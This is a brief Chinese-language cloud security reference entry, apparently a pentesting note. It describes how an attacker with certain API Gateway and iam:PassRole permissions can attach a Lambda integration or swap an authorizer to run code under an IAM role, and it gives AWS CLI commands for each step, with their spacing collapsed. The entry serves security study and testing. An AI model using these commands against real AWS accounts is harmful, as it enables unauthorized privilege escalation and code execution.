具有权限 apigateway:PutIntegration、apigateway:CreateDeployment 和 iam:PassRole 的攻击者可以 向现有的 API Gateway REST API 添加一个带有 IAM 角色的 Lambda 函数的新集成。攻击者可以 触发 Lambda 函数以执行任意代码,并可能获得与 IAM 角色关联的资源的访问权限。
API_ID="your-api-id"RESOURCE_ID="your-resource-id"HTTP_METHOD="GET"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"# Add a new integration to the API Gateway REST APIawsapigatewayput-integration--rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --typeAWS_PROXY--integration-http-methodPOST--uriarn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations--credentials $LAMBDA_ROLE_ARN# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd
API_ID="your-api-id"AUTHORIZER_ID="your-authorizer-id"LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"# Update the API Gateway authorizerawsapigatewayupdate-authorizer--rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uriarn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations# Create a deployment for the updated API Gateway REST APIawsapigatewaycreate-deployment--rest-api-id $API_ID --stage-nameProd